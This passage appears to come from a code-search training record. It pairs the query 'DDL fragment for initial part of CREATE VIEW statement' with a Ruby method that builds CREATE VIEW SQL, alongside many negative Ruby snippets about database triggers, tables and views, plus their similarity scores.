"def trigger\n trigger_function = \"insert_#{master_table}\"\n unless @column == 'page'\n column = \"#{@column},\"\n column_function = \"coalesce(quote_literal(NEW.#{@column}), 'NULL') || ',' ||\"\n end\n \n cmd = <<-COMMAND\n CREATE OR REPLACE FUNCTION #{trigger_function}() \n RETURNS TRIGGER AS $$ \n DECLARE\n ins_sql TEXT; \n BEGIN\n ins_sql := 'INSERT INTO daily_#{@column}_views_' || (NEW.writer_id % #{@partition_size}) ||\n '(date,article_id,#{column}count,writer_id,partition_id) \n VALUES ' ||\n '('|| quote_literal(NEW.date) || ',' || NEW.article_id ||',' ||\n \t#{column_function} \n \t\t\tNEW.count || ',' || \n \t\t\tNEW.writer_id || ',' || (NEW.writer_id % #{@partition_size}) ||')'\n ; \n EXECUTE ins_sql;\n RETURN NULL;\n END; \n $$\n LANGUAGE plpgsql;\n \n CREATE TRIGGER #{trigger_function}_trigger\n BEFORE INSERT ON #{master_table}\n FOR EACH ROW EXECUTE PROCEDURE #{trigger_function}();\n COMMAND\n @conns.each{|conn| conn.exec(cmd)}\n end",
"def create_trigger(*args)\n username, arguments = extract_username(args)\n attrs = valid_trigger_attrs(arguments)\n\n post api_url(username, 'triggers'), attrs\n end",
"def enable_trigger(trigger = 'ALL')\n connection.enable_trigger(table_name, trigger)\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def get_triggers\n connect_db.fetch(\"SELECT RDB$TRIGGER_NAME, RDB$TRIGGER_SOURCE FROM RDB$TRIGGERS WHERE RDB$SYSTEM_FLAG = 0\")\n end",
"def add_trigger_and_function(filename, trigger_tables, drop_function=false)\n build_query filename, 'triggers' do |seed, queries|\n queries[0] << %Q!BEGIN;\n CREATE OR REPLACE FUNCTION #{seed['name']}() RETURNS #{seed['function']['return']} AS $$\n BEGIN\n #{seed['function']['sql']}\n END;\n $$ LANGUAGE plpgsql;\n #{Array(trigger_tables).map do |table|\n \"CREATE TRIGGER #{seed['name']} #{seed['trigger']['event'].gsub('<TRIGGERTABLE>', table)} #{seed['trigger']['execute']} #{seed['name']}();\"\n end.join(\"\\n\")}\n COMMIT;!\n queries[1] << Array(trigger_tables).map { |table| \"DROP TRIGGER IF EXISTS #{seed['name']} ON #{table};\\n\" } << (drop_function ? \"DROP FUNCTION IF EXISTS #{seed['name']};\" : '')\n end\n end",
"def to_create_database_sql(db)\n db.send(:create_database_sql, self.name, {})\n end",
"def create_db_cmd!\n \"createdb -e #{new_db_name}\"\n end",
"def triggerType _args\n \"triggerType _args;\" \n end",
"def trigger!\n end",
"def drop_trigger(table_name, trigger_name, options = {})\n SchemaMonkey::Middleware::Migration::CreateTrigger.start(connection: self, table_name: table_name, trigger_name: trigger_name, options: options) do |env|\n table_name = env.table_name\n trigger_name = env.trigger_name\n options = env.options\n\n sql = \"DROP TRIGGER\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(trigger_name)} ON #{quote_table_name(table_name)}\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def triggers\n Triggers.all(connection)\n end",
"def CreateTrigger params = {}\n \n APICall(path: 'triggers.json',method: 'POST',payload: params.to_json)\n \n end",
"def trigger_name(proc_name, options)\n if name = options[:name]\n name\n else\n \"trigger_#{proc_name.gsub('(', '').gsub(')', '')}\"\n end\n end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def add_trigger(opts)\n opts = opts.with_indifferent_access\n t = Trigger.new\n t.check_id = opts[:check_id]\n t.metric_id = opts[:metric_id]\n t.set_severity(opts[:severity])\n t.sign = opts[:sign].to_sym\n t.threshold = opts[:threshold]\n t.status = array(opts[:status]).map{ |s| s.upcase }\n\n t.save!\n t\n end",
"def create_trigger(trigger, conditions = [], dampenings = [], _actions = [])\n full_trigger = {}\n full_trigger[:trigger] = trigger.to_h\n conds = []\n conditions.each { |c| conds.push(c.to_h) }\n full_trigger[:conditions] = conds\n damps = []\n dampenings.each { |d| damps.push(d.to_h) } unless dampenings.nil?\n full_trigger[:dampenings] = damps\n\n http_post 'triggers/trigger', full_trigger\n end",
"def trigger\n @trigger ||= begin\n trigger = Scrutinize::Trigger.new\n\n # Trigger configured at top level\n keys = %w(methods method targets target)\n unless (@options.keys & keys).empty?\n trigger.add @options.select { |k,v| keys.include?(k) }\n end\n\n # Trigger configured under trigger key\n trigger.add @options['trigger'] if @options['trigger'].is_a?(Hash)\n\n # Triggers configured under triggers key\n if @options['triggers'].is_a? Array\n @options['triggers'].each { |t| trigger.add t }\n end\n\n trigger\n end\n end",
"def trigger(owner, event, *args); end",
"def triggers(name = nil)\n raise \"Internal Error: Connection adapter did not override abstract function\"\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def create_queries\n gen_rulename\n [\"\n -- FN for sync updates \n CREATE FUNCTION fn_#{suffix}()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n UPDATE #{dest_table}\n SET #{ cols.map{|src, dest| \"\\\"#{dest}\\\" = NEW.\\\"#{src}\\\"\" }.join(', ') }\n WHERE \\\"#{map_dest}\\\" = NEW.\\\"#{map_src}\\\";\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for sync updates\n CREATE TRIGGER tr_#{suffix}\n AFTER INSERT OR UPDATE ON #{src_table} \n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}();\",\n \"\n -- FN for cleaner\n CREATE FUNCTION fn_#{suffix}_cleaner()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n IF OLD.sid = #{sid_src} OR OLD.sid = #{sid_dest} THEN\n #{delete_queries.join(' ')}\n END IF;\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for cleaner\n CREATE TRIGGER tr_#{suffix}_cleaner\n AFTER DELETE ON #{surveys_table}\n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}_cleaner();\n \"]\n end",
"def parse_event(trigger_definition, trigger_name)\n trigger_definition[/^CREATE[\\sA-Z]+TRIGGER[\\s]#{Regexp.escape(trigger_name)}[\\s](.*?)[\\s]ON[\\s]/m, 1]\n end",
"def triggerActivation _args\n \"triggerActivation _args;\" \n end",
"def enable_event_trigger(name, options = {})\n if options[:always] && options[:replica]\n raise ArgumentError.new(\"Cannot use :replica and :always together when enabling an event trigger.\")\n end\n\n sql = \"ALTER EVENT TRIGGER #{quote_generic(name)} ENABLE\"\n\n if options[:always]\n sql << ' ALWAYS'\n elsif options[:replica]\n sql << ' REPLICA'\n end\n\n execute \"#{sql};\"\n end",
"def trigger_options\n triggers.map { |t, _| [t.gsub('on_', '').titlecase, t] }\n end",
"def checkTrigger\n\t end",
"def enable_triggers(enable = true)\n triggers.each do |trigger|\n sql = \"alter trigger #{trigger.name} #{enable ? :enable : :disable}\"\n OracleTables.exec_sql sql\n end\n end",
"def create_change_log(database)\n silence_ddl_notices(database) do\n connection = session.send(database)\n table_name = \"#{options[:rep_prefix]}_pending_changes\"\n connection.create_table table_name\n connection.add_column table_name, :change_table, :string\n connection.add_column table_name, :change_key, :string\n connection.add_column table_name, :change_new_key, :string\n connection.add_column table_name, :change_type, :string\n connection.add_column table_name, :change_time, :timestamp\n connection.remove_column table_name, 'id'\n connection.add_big_primary_key table_name, 'id'\n end\n end",
"def create_group_trigger(trigger)\n ret = http_post 'triggers/groups', trigger.to_h\n Trigger.new(ret)\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def trigger(*args)\n username, arguments = extract_username(args)\n trigger_id = get_id_from_arguments(arguments)\n\n get api_url(username, 'triggers', trigger_id)\n end",
"def remove_trigger(table_name, proc_name, options = {})\n\n end",
"def to_s\n \"trigger\"\n end",
"def triggerText _args\n \"triggerText _args;\" \n end",
"def is_constraint?(trigger_definition)\n !!(trigger_definition =~ /^CREATE CONSTRAINT TRIGGER/)\n end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def trigger(name, *args)\n Events.use(name, *args)\n end",
"def test_can_retrieve_trigger_metadata\n skip(\"Triggers were introduced in Cassandra 2.0\") if CCM.cassandra_version < '2.0.0'\n\n # trigger1, on test1 table\n @session.execute(\"CREATE TRIGGER trigger1 ON simplex.test1 USING 'org.apache.cassandra.triggers.AuditTrigger'\")\n @listener.wait_for_trigger('simplex', 'test1', 'trigger1')\n\n assert @cluster.keyspace('simplex').table('test1').has_trigger?('trigger1')\n trigger_meta = @cluster.keyspace('simplex').table('test1').trigger('trigger1')\n assert_equal 'trigger1', trigger_meta.name\n assert_equal 'test1', trigger_meta.table.name\n assert_equal 'org.apache.cassandra.triggers.AuditTrigger', trigger_meta.options['class']\n\n # trigger1, on test2 table\n @session.execute(\"CREATE TRIGGER trigger1 ON simplex.test2 USING 'org.apache.cassandra.triggers.AuditTrigger'\")\n @listener.wait_for_trigger('simplex', 'test2', 'trigger1')\n\n assert @cluster.keyspace('simplex').table('test2').has_trigger?('trigger1')\n trigger_meta2 = @cluster.keyspace('simplex').table('test2').trigger('trigger1')\n assert_equal 'trigger1', trigger_meta2.name\n assert_equal 'test2', trigger_meta2.table.name\n assert_equal 'org.apache.cassandra.triggers.AuditTrigger', trigger_meta2.options['class']\n\n refute_equal trigger_meta, trigger_meta2\n end",
"def create_database_sql(name, opts = {})\n \"CREATE DATABASE #{quote_identifier(name)}\"\n end",
"def initialize(trigger=ALL)\n list_triggers = get_all_triggers\n if not list_triggers.include? trigger\n raise QueryException.new(\"The trigger value must be one of #{list_triggers.join(', ')}\")\n end\n \n @trigger = trigger\n \n end",
"def create_event(db, name, type, date, happened)\n db.execute(\"INSERT INTO events (event_name, type_of_event, date_of_event, has_happened) VALUES (?, ?, ?, ?)\", [name, type, date, happened])\nend",
"def drop_trigger(table, name, opts=OPTS)\n self << drop_trigger_sql(table, name, opts)\n end",
"def generate\n if Rails.version < '4'\n migration_template('rails3_migration',\n \"#{db_migrate_path}/create_db_poller.rb\")\n else\n migration_template('migration',\n \"#{db_migrate_path}/create_db_poller.rb\")\n end\n end",
"def triggers\n @_triggers ||= Trigger\n .joins(:crud_action)\n .where(klass: item.class.name,\n crud_actions: { name: @transaction })\n end",
"def setTriggerStatements _obj, _args\n \"_obj setTriggerStatements _args;\" \n end",
"def copy_bucket_maker_migration\n if behavior == :invoke && store_in == 'active_record' && active_recordable_exists?\n migration_template \"active_recordable_migration.rb\", \"db/migrate/create_#{ACTIVE_RECORDABLE.pluralize}\"\n end\n end",
"def generate(table_name, statement)\n alter_argument = AlterArgument.new(statement)\n dsn = DSN.new(connection_details.database, table_name)\n\n \"#{command} #{all_options} #{dsn} #{alter_argument}\"\n end",
"def create\n puts \"Creating tumblr\"\n ActiveRecord::Base.connection.execute(File.open(\"db/schema.sql\").read)\n end",
"def name\n\t\t\"db_fun\"\n\tend",
"def fire\n PassiveRecord::Adapter.execute to_sql\n end",
"def setTriggerType _obj, _args\n \"_obj setTriggerType _args;\" \n end",
"def trigger param\r\n self.send \"trig_#{param[:type] || :edge}\".to_sym, param\r\n end",
"def create\n @trigger = Trigger.new(params[:trigger])\n\n respond_to do |format|\n if @trigger.save\n flash[:notice] = 'Trigger was successfully created.'\n format.html { redirect_to(@trigger) }\n format.xml { render :xml => @trigger, :status => :created, :location => @trigger }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @trigger.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def setTriggerText _obj, _args\n \"_obj setTriggerText _args;\" \n end",
"def drop_event_trigger(name, options = {})\n sql = 'DROP EVENT TRIGGER '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_generic(name)\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def create\n database.command({ :create => name }.merge(options))\n end",
"def create_watch_table(database)\n\tcreate_watch_table_cmd = <<-SQL \n\tCREATE TABLE IF NOT EXISTS watchlist(\n\t\tid INTEGER PRIMARY KEY,\n\t\tticker VARCHAR(6),\n\t\tinitial_price FLOAT(2),\n\t\tcurrent_price FLOAT(2),\n\t\tuser_id int,\n\t\tFOREIGN KEY (user_id) REFERENCES users(id)\n\t)\nSQL\n\tdatabase.execute(create_watch_table_cmd)\nend",
"def trigger_exists?(database, table)\n trigger_name = \"#{options(table)[:rep_prefix]}_#{table}\"\n session.send(database).replication_trigger_exists? trigger_name, table\n end",
"def createProjectTable\n @Handle.execute( @ProjectSchema ) \n end",
"def switch_trigger_mode(database, table, exclude_rr_activity)\n options = session.configuration.options\n if session.send(database).replication_trigger_exists? \"#{options[:rep_prefix]}_#{table}\", table\n params = {\n :trigger_name => \"#{options[:rep_prefix]}_#{table}\",\n :table => table,\n :keys => session.send(database).primary_key_names(table),\n :log_table => \"#{options[:rep_prefix]}_pending_changes\",\n :activity_table => \"#{options[:rep_prefix]}_running_flags\",\n :key_sep => options[:key_sep],\n :exclude_rr_activity => exclude_rr_activity,\n }\n session.send(database).create_or_replace_replication_trigger_function(params)\n end\n end",
"def after_create(record)\n contents = to_sql_insert(record)\n to_logfile(contents)\n # Send a notification to the admin, if requested:\n if @email_on_create\n AgexMailer.action_notify_mail(\n record.respond_to?(:user) ? record.user : nil,\n \"#{@table_name} row CREATED\",\n contents\n ).deliver\n end\n end",
"def alter(field)\n sql = build_sql(field)\n execute(sql)\nend",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def drop_replication_trigger(trigger_name, table_name)\n %w(insert update delete).each do |action|\n execute \"DROP TRIGGER `#{trigger_name}_#{action}`;\"\n end\n execute \"DROP PROCEDURE `#{trigger_name}`;\"\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def on_db_vuln(vuln)\n\tend",
"def auto_increment_sql\n 'AUTOINCREMENT'\n end",
"def trigger_kind\n attributes.fetch(:triggerKind)\n end",
"def trigger_kind\n attributes.fetch(:triggerKind)\n end",
"def create_build_trigger request_pb, options = nil\n raise ::ArgumentError, \"request must be provided\" if request_pb.nil?\n\n verb, uri, query_string_params, body = ServiceStub.transcode_create_build_trigger_request request_pb\n query_string_params = if query_string_params.any?\n query_string_params.to_h { |p| p.split \"=\", 2 }\n else\n {}\n end\n\n response = @client_stub.make_http_request(\n verb,\n uri: uri,\n body: body || \"\",\n params: query_string_params,\n options: options\n )\n operation = ::Gapic::Rest::TransportOperation.new response\n result = ::Google::Cloud::Build::V1::BuildTrigger.decode_json response.body, ignore_unknown_fields: true\n\n yield result, operation if block_given?\n result\n end",
"def add_trigger(condition, name=nil, &action)\n trigger = com.ardor3d.input.logical.InputTrigger.new(condition, &action)\n trigger.set_id(name) if name\n logical.registerTrigger(trigger)\n trigger\n end",
"def create_pt_heartbeat_hint\n exec_cmd(\"CREATE DATABASE IF NOT EXISTS start_pt_heartbeat\")\n end",
"def disable_trigger(trigger = 'ALL')\n connection.disable_trigger(table_name, trigger)\n end",
"def synchronizedTriggers _args\n \"synchronizedTriggers _args;\" \n end",
"def generate_migration_body(tables)\n current_tables, new_tables = table_names(tables).partition do |table_name| \n @db_table_names.include?(table_name)\n end\n\n add_line \"change do\"\n create_new_tables(new_tables, tables)\n alter_tables(current_tables, tables)\n add_line \"end\"\n end",
"def create_trigger(hook_id:, project_id:, trigger_body:)\n url = \"#{@base_url}/vapid/webhooks/hooks/#{hook_id}/triggers?project_id=#{project_id}\"\n res = HTTParty.post(url, body: trigger_body.to_json, headers: procore_headers(token: @customer_info[:token], company_id: @customer_info[:company_id]) ) # returns HTTParty object {code, response}\n if res.code == 201\n res\n else\n raise StandardError.new({message: 'Error Creating Hook', data: res})\n end \n end",
"def create_sequence_statement(repository, property)\n \"CREATE SEQUENCE #{quote_column_name(sequence_name(repository, property))}\"\n end",
"def create_sql(from_id, to_id)\n <<~SQL\n WITH created_records AS #{Gitlab::Database::AsWithMaterialized.materialized_if_supported} (\n INSERT INTO services (project_id, #{DEFAULTS.keys.map { |key| %(\"#{key}\")}.join(',')}, created_at, updated_at)\n #{select_insert_values_sql(from_id, to_id)}\n RETURNING *\n )\n SELECT COUNT(*) as number_of_created_records\n FROM created_records\n SQL\n end",
"def create_member_trigger(group_member_info)\n ret = http_post 'triggers/groups/members', group_member_info.to_h\n Trigger.new(ret)\n end",
"def raw_sql(record)\n record.class.arel_table.create_insert.tap do |insert_manager|\n insert_manager.insert(insert_values(record))\n end.to_sql\n end",
"def replication_trigger_exists?(trigger_name, table_name)\n !select_all(\"select 1 from information_schema.triggers where trigger_schema = database() and trigger_name = '#{trigger_name}_insert' and event_object_table = '#{table_name}'\").empty?\n end",
"def trigger_exists?(table_name, trigger_name)\n triggers(table_name).detect { |i| i.name == trigger_name }\n end",
"def create\n\t\tsql = \"CREATE TABLE `#{@table}` (\"\n\t\t@columns.each do |column|\n\t\t\tsql += \"`#{column[:name]}` #{column[:type]}\"\n\t\t\tif(column[:not_null])\n\t\t\t\tsql += ' NOT NULL'\n\t\t\tend\n\n\t\t\tif(column[:primary_key])\n\t\t\t\tsql += ' PRIMARY KEY'\n\t\t\tend\n\n\t\t\tif(column[:auto_increment])\n\t\t\t\tsql += ' AUTOINCREMENT'\n\t\t\tend\n\n\t\t\tif(column[:unique])\n\t\t\t\tsql += ' UNIQUE'\n\t\t\tend\n\t\t\tsql += ','\n\t\tend\n\t\tsql.chop! # Remove trailing ','\n\t\tsql += ');'\n\t\tp sql\n\t\t@db.execute(sql)\n\tend"
] |
[
"0.7504239",
"0.7398713",
"0.71695596",
"0.716204",
"0.69328403",
"0.6909614",
"0.6909614",
"0.68390316",
"0.6784707",
"0.65625846",
"0.62844837",
"0.6207567",
"0.6205865",
"0.6203629",
"0.6160155",
"0.6159027",
"0.60619485",
"0.6052486",
"0.6001266",
"0.59768575",
"0.5899913",
"0.58506125",
"0.57457817",
"0.57381433",
"0.5727514",
"0.57000446",
"0.565338",
"0.5648798",
"0.56444323",
"0.5637746",
"0.5635928",
"0.56316155",
"0.5623096",
"0.5547945",
"0.55458313",
"0.55048275",
"0.5477467",
"0.5466842",
"0.5415819",
"0.539012",
"0.5386233",
"0.53694844",
"0.5349302",
"0.53474",
"0.53414464",
"0.5331691",
"0.52772063",
"0.5274943",
"0.5272027",
"0.52698845",
"0.52678216",
"0.5263491",
"0.52624005",
"0.5257083",
"0.5248272",
"0.52447516",
"0.52423215",
"0.52230453",
"0.52171797",
"0.5214975",
"0.5212365",
"0.5191404",
"0.519122",
"0.5189333",
"0.5179841",
"0.51785856",
"0.5172144",
"0.51708233",
"0.51673776",
"0.5139923",
"0.51291376",
"0.5126428",
"0.5123939",
"0.5117739",
"0.51153904",
"0.51149863",
"0.50941265",
"0.50792444",
"0.50737983",
"0.50737983",
"0.5069237",
"0.50675154",
"0.50606865",
"0.5049591",
"0.5039414",
"0.5039414",
"0.50375396",
"0.50372833",
"0.50359464",
"0.5027749",
"0.501772",
"0.50162876",
"0.5015376",
"0.5013185",
"0.50051665",
"0.5001096",
"0.49929312",
"0.49900317",
"0.49895212",
"0.4978154"
] |
0.73837554
|
2
|
DDL fragment for initial part of CREATE VIEW statement
|
def create_view_prefix_sql(name, options)
  sql = create_view_sql_append_columns("CREATE #{'OR REPLACE ' if options[:replace]}#{'TEMPORARY ' if options[:temp]}#{'RECURSIVE ' if options[:recursive]}#{'MATERIALIZED ' if options[:materialized]}VIEW #{quote_schema_table(name)}", options[:columns] || options[:recursive])
  if options[:security_invoker]
    sql += " WITH (security_invoker)"
  end
  if (tablespace = options[:tablespace])
    sql += " TABLESPACE #{quote_identifier(tablespace)}"
  end
  sql
end
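
A minimal, self-contained sketch of what this prefix builder emits for a few option hashes. The quoting helpers and the column-append hook below are simplified stand-ins for illustration (assumptions, not Sequel's actual implementations):

# Illustration only: stand-in helpers so the fragment can run outside Sequel.
class ViewPrefixSketch
  def quote_schema_table(name)
    "\"#{name}\""
  end

  def quote_identifier(name)
    "\"#{name}\""
  end

  # Appends an explicit "(col1, col2)" list when one is supplied.
  def create_view_sql_append_columns(sql, columns)
    columns.is_a?(Array) ? "#{sql} (#{columns.join(', ')})" : sql
  end

  def create_view_prefix_sql(name, options)
    sql = create_view_sql_append_columns("CREATE #{'OR REPLACE ' if options[:replace]}#{'TEMPORARY ' if options[:temp]}#{'RECURSIVE ' if options[:recursive]}#{'MATERIALIZED ' if options[:materialized]}VIEW #{quote_schema_table(name)}", options[:columns] || options[:recursive])
    sql += " WITH (security_invoker)" if options[:security_invoker]
    if (tablespace = options[:tablespace])
      sql += " TABLESPACE #{quote_identifier(tablespace)}"
    end
    sql
  end
end

sketch = ViewPrefixSketch.new
puts sketch.create_view_prefix_sql(:recent_orders, replace: true)
# => CREATE OR REPLACE VIEW "recent_orders"
puts sketch.create_view_prefix_sql(:order_totals, materialized: true, tablespace: :fast_disk)
# => CREATE MATERIALIZED VIEW "order_totals" TABLESPACE "fast_disk"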
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_view_prefix_sql(name, options)\n create_view_sql_append_columns(\"CREATE #{'OR REPLACE 'if options[:replace]}VIEW #{quote_schema_table(name)}\", options[:columns])\n end",
"def create_view(name, source)\n source = source.sql if source.is_a?(Dataset)\n execute(\"CREATE VIEW #{name} AS #{source}\")\n end",
"def create_view_sql(name, source, options)\n source = source.sql if source.is_a?(Dataset)\n sql = String.new\n sql << \"#{create_view_prefix_sql(name, options)} AS #{source}\"\n if check = options[:check]\n sql << \" WITH#{' LOCAL' if check == :local} CHECK OPTION\"\n end\n sql\n end",
"def create_view(view_name, definition, options={})\n SchemaMonkey::Middleware::Migration::CreateView.start(connection: self, view_name: view_name, definition: definition, options: options) do |env|\n definition = env.definition\n view_name = env.view_name\n options = env.options\n definition = definition.to_sql if definition.respond_to? :to_sql\n\n if options[:materialized] && options[:allow_replace]\n raise ArgumentError, 'allow_replace is not supported for materialized views'\n end\n\n if options[:force]\n drop_view(view_name, {if_exists: true}.merge(options.slice(:materialized)))\n end\n\n command = if options[:materialized]\n \"CREATE MATERIALIZED\"\n elsif options[:allow_replace]\n \"CREATE OR REPLACE\"\n else\n \"CREATE\"\n end\n\n execute \"#{command} VIEW #{quote_table_name(view_name)} AS #{definition}\"\n end\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def write_view_definition(stream, table_schema, table_name, view_definition)\n stream << \" create_view \\\"#{table_schema}.#{table_name}\\\", <<-SQL\\n\" \\\n \" #{view_definition}\\n\" \\\n \" SQL\\n\"\n end",
"def write_foods_view()\n puts <<SQL\nDROP VIEW IF EXISTS foods;\n\nCREATE VIEW foods AS\nSELECT food_description.id, food_description.description,\n nutrient_data.nutrient_value AS kcal,\n food_group.description AS food_group,\n food_description.refuse_percentage, food_description.refuse_description\n FROM food_description, nutrient_definition, nutrient_data, food_group\n WHERE food_description.id = nutrient_data.food_id\n AND food_group.id = food_description.food_group_id\n AND nutrient_definition.id = nutrient_data.nutrient_id\n AND nutrient_definition.id = '208'\n AND food_group.id NOT IN ('0300', '2100', '2200', '3600');\nSQL\nend",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def recreate_view name\n view_structure = ActiveRecord::Base.connection.select_value(\"select definition from pg_views where viewname='#{name}'\")\n if view_structure\n execute \"DROP VIEW IF EXISTS #{name}\"\n execute \"CREATE VIEW #{name} AS #{view_structure};\"\n end\n end",
"def create_or_replace_view(name, source)\n source = source.sql if source.is_a?(Dataset)\n execute(\"CREATE OR REPLACE VIEW #{name} AS #{source}\")\n end",
"def create_view(name, source, options = OPTS)\n execute_ddl(create_view_sql(name, source, options))\n remove_cached_schema(name)\n nil\n end",
"def materialized_view_definition(matview_name, name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; end",
"def create_view(name, body = nil, force: false, **kwargs, &block)\n kwargs[:sqlite3] = !!(adapter_name =~ /sqlite/i)\n\n drop_view(name) if force && table_exists?(name)\n\n execute build_create_view_query(name, body, **kwargs, &block)\n end",
"def view_select_statement(view, name=nil)\n q =<<-ENDSQL\n SELECT\n SM.definition\n FROM\n sys.objects O\n JOIN\n sys.sql_modules SM ON o.object_id = SM.object_id\n WHERE\n o.type = 'V' AND o.name = '#{view}'\n ENDSQL\n \n view_def = select_value(q, name)\n \n if view_def\n return convert_statement(view_def)\n else\n raise \"No view called #{view} found\"\n end\n end",
"def create_view_sql_append_columns(sql, columns)\n if columns\n sql += ' ('\n schema_utility_dataset.send(:identifier_list_append, sql, columns)\n sql << ')'\n end\n sql\n end",
"def create_view table_id, query, name: nil, description: nil\n options = { query: query, name: name, description: description }\n insert_table table_id, options\n end",
"def drop_view(name)\n execute(\"DROP VIEW #{name}\")\n end",
"def create_materialized_view(name, body = nil, force: false, **kwargs, &block)\n supports_materialized_view!\n\n drop_materialized_view(name) if force && table_exists?(name)\n\n execute build_create_materialized_view_query(name, body, **kwargs, &block)\n end",
"def update_view name, type, columns, options={}\n view_structure = ActiveRecord::Base.connection.select_value(\"select definition from pg_views where viewname='#{name}'\")\n raise ViewNotExistException(\"View #{name} does not exist in current db\") unless view_structure\n \n columns_str = columns.is_a?(Array) ? columns.join(',') : columns\n \n select_pattern = /select (.*) from/i\n select_str = view_structure[select_pattern,1]\n\n case type\n when :add\n view_structure.gsub!(select_pattern, \"SELECT #{select_str}, #{columns_str} FROM\")\n when :remove\n select_str.gsub!(\", #{columns_str}\", '')\n view_structure.gsub!(select_pattern, \"SELECT #{select_str} FROM\")\n when :replace\n view_structure.gsub!(select_pattern, \"SELECT #{columns_str} FROM\")\n end\n\n drop_views name, options[:dependent_views] \n execute \"CREATE VIEW #{name} AS #{view_structure};\"\n end",
"def create_or_replace_view(name, source, options = OPTS)\n if supports_create_or_replace_view?\n options = options.merge(:replace=>true)\n else\n swallow_database_error{drop_view(name)}\n end\n\n create_view(name, source, options)\n nil\n end",
"def view_select_statement(view, name=nil)\n row = execute(\"SELECT VIEW_DEFINITION FROM SYSIBM.VIEWS WHERE TABLE_NAME = '#{view}'\", name).each do |row|\n return row[0]\n end\n raise \"No view called #{view} found\"\n end",
"def view(name)\n new_view = view_old(name)\n new_view.table_name = name\n new_view\n end",
"def migration_set_attribs\n tcs = table_comments || {}\n\n if view_sql&.strip&.present?\n view_sql_text = <<~VSTEXT\n self.view_sql = <<~VIEWSQL\n #{view_sql}\n VIEWSQL\n VSTEXT\n end\n\n <<~SETATTRIBS\n self.schema = '#{db_migration_schema}'\n self.table_name = '#{table_name}'\n self.class_name = '#{class_name}'\n self.fields = %i[#{migration_fields_array.join(' ')}]\n self.table_comment = '#{tcs[:table]}'\n self.fields_comments = #{(tcs[:fields] || {}).to_h}\n self.db_configs = #{(db_configs || {}).to_h}\n self.no_master_association = #{!!no_master_association}\n self.resource_type = :#{resource_type}\n self.all_referenced_tables = #{(all_referenced_tables || []).to_a}\n #{view_sql_text}\n SETATTRIBS\n end",
"def cd_id_table\n view_name = cd_id_table_tn\n if @cd_id_table_tn_exists.nil?\n @cd_id_table_tn_exists=true\n if !$db.table_exists?(view_name)\n $db.run(\"CREATE VIEW #{view_name} AS SELECT DISTINCT(r.canonical_document_id) FROM records r INNER JOIN records_searches br ON r.id=br.record_id INNER JOIN searches b ON br.search_id=b.id WHERE b.systematic_review_id=#{self[:id]} AND b.valid=1\n\n UNION\n\n SELECT DISTINCT r.canonical_document_id FROM searches b INNER JOIN records_searches br ON b.id=br.search_id INNER JOIN records_references rr ON br.record_id=rr.record_id INNER JOIN bib_references r ON rr.reference_id=r.id WHERE b.systematic_review_id=#{self[:id]} and r.canonical_document_id IS NOT NULL and b.valid=1 GROUP BY r.canonical_document_id\")\n end\n end\n $db[view_name.to_sym]\n end",
"def migration_update_view\n _added, _removed, _changed, prev_fields = field_changes\n\n if table_comments\n new_table_comment = table_comment_changes\n new_fields_comments = fields_comments_changes\n end\n\n new_fields_comments ||= {}\n\n <<~ARCONTENT\n #{table_name_changed ? \" self.prev_table_name = '#{prev_table_name}'\" : ''}\n #{table_name_changed ? ' update_table_name' : ''}\n self.prev_fields = %i[#{prev_fields.join(' ')}]\n #{new_table_comment ? \" \\# new table comment: #{new_table_comment.gsub(\"\\n\", '\\n')}\" : ''}\n #{new_fields_comments.present? ? \" \\# new fields comments: #{new_fields_comments.keys}\" : ''}\n create_or_update_dynamic_model_view\n ARCONTENT\n end",
"def tableView(aView, validateDrop:info, proposedRow:row, proposedDropOperation:op)\n NSDragOperationEvery\n end",
"def create_view(view, cspec)\n\tKernel.system(\"perl #{$scripts}/ct-mkview.pl -raw -name #{view} -dynamic -spec #{cspec}\")\n\treturn $? == 0\nend",
